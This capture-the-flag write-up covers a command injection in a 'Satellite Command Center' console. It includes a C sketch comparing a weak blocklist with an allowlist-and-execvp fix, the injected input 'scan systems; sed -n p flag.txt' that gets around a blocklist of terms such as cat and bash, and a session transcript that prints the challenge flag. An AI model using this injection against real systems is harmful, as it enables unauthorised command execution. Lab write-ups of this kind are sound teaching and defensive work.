Flash CTF – Satellite Command

Challenge Description

You are given access to a small Satellite Command Center console that lets “authorized personnel” query the contents of several subsystems. The interface understands a handful of commands, such as status, scan <directory>, help, and exit. Unfortunately for the satellite engineers, the console builds a shell command from improperly sanitized user input and then forwards it directly to /bin/sh. With a little creativity we can abuse this behavior to execute arbitrary commands and steal the flag that lives on the satellite.


Recon & Static Analysis

  • Listing the files that ship with the challenge we find a 64-bit ELF named challenge and a Dockerfile showing how the challenge is deployed.
  • Loading the binary in tools such as strings, ltrace, or a disassembler quickly reveals that the scan command eventually reaches a call to system() that looks roughly like this:
system("ls -l ./satellite/" + <sanitized_user_input> + " 2>/dev/null");

system(3) executes an entire shell command line, so everything after our directory name is interpreted by the shell. The sanitization function applies a limited blocklist that rejects a few terms (cat, bash, …) and metacharacters (|, &&, >, …), but the list is not nearly comprehensive enough to prevent command injection.

Notably, the blocklist:

  • Still does not block the semicolon ; that terminates a command, and
  • Only forbids a short list of commands (cat, head, less, and so on). Countless other utilities such as sed, awk, or printf remain permissible, so we can simply use one of those to read the flag.
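As an added example (not the challenge binary's own code), the C sketch below puts a blocklist check of the kind the writeup describes next to the fix a defender would ship: an exact-match allowlist of subsystem names and an execvp call that never hands the string to a shell. The blocked terms and subsystem names are taken from this writeup; the exact list inside the binary, the function names and the buffer sizes are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Weak check, modelled on the writeup: reject a few substrings and nothing else
   (the real list in the binary is unknown; this one is assumed). */
static const char *BLOCKLIST[] = { "cat", "head", "less", "bash", "|", "&&", ">", NULL };

int blocklist_allows(const char *input) {
    for (int i = 0; BLOCKLIST[i]; i++)
        if (strstr(input, BLOCKLIST[i]) != NULL) return 0;
    return 1;   /* ';' and 'sed' are not listed, so the injection slips through */
}

/* Strong check: the argument must be exactly one of the known subsystem names. */
static const char *SUBSYSTEMS[] = { "systems", "telemetry", "comms",
                                    "payload", "maintenance", NULL };

int allowlist_allows(const char *input) {
    for (int i = 0; SUBSYSTEMS[i]; i++)
        if (strcmp(input, SUBSYSTEMS[i]) == 0) return 1;
    return 0;
}

/* Run "ls -l ./satellite/<name>" with no shell in the loop: the argv array goes
   straight to execvp, so ';', '|' and '>' would only ever be bytes of a path.
   Returns ls's exit status, or -1 if the name was rejected or the child failed. */
int scan_subsystem(const char *name) {
    if (!allowlist_allows(name)) return -1;
    char path[64];
    snprintf(path, sizeof path, "./satellite/%s", name);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *argv[] = { "ls", "-l", path, NULL };
        execvp("ls", argv);
        _exit(127);                 /* only reached if exec itself failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    const char *injected = "systems; sed -n p flag.txt";   /* constructed input */
    printf("blocklist allows injected input: %d\n", blocklist_allows(injected));
    printf("allowlist allows injected input: %d\n", allowlist_allows(injected));
    return scan_subsystem("systems") == 0 ? 0 : 1;
}
```

Run from a directory containing ./satellite/systems to see the allowlisted scan succeed; any input that is not an exact subsystem name is refused before a process is ever spawned.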

Crafting a Payload

Our goal is to read flag.txt, which lives in the same directory as the binary (see the Dockerfile):

COPY ./flag.txt /srv/app/flag.txt

Complete input:

scan systems; sed -n p flag.txt

Breakdown:

  • scan systems – required prefix.
  • ; – closes the benign ls command.
  • sed -n p flag.txt – prints every line of flag.txt without using any blocked terms.

When substituted into the system() call, the binary runs

ls -l ./satellite/systems; sed -n p flag.txt 2>/dev/null

which prints the flag to our terminal.


Exploitation Walk-through

$ nc <HOST> <PORT>
    /\    
   /  \   SATELLITE COMMAND CENTER v1.337
  /____\  ================================
  |    |  Authorized Personnel Only
  |    |  
  |____|
  \/\/\/


SATCOM> Available commands:
1. status - Check satellite status
2. scan [directory] - Scan satellite directory contents
3. help - Show this help message
4. exit - Terminate connection

Available subsystems:
- systems    - Core system monitoring
- telemetry  - Orbital telemetry data
- comms      - Communication systems
- payload    - Mission payload data
- maintenance - Maintenance logs

SATCOM> scan systems; sed -n p flag.txt

[DEBUG] Executing command: ls -l ./satellite/systems; sed -n p flag.txt 2>/dev/null
[SCANNING]: systems; sed -n p flag.txt
total 8
-rwxr-xr-x    1 nobody   nobody          18 Jun 24 17:49 power.dat
-rwxr-xr-x    1 nobody   nobody         157 Jun 24 17:49 system.log
MetaCTF{a7_l3a$t_r3al_c0mm4nd_4nd_c0ntr0l_u53s_3ncryp710n}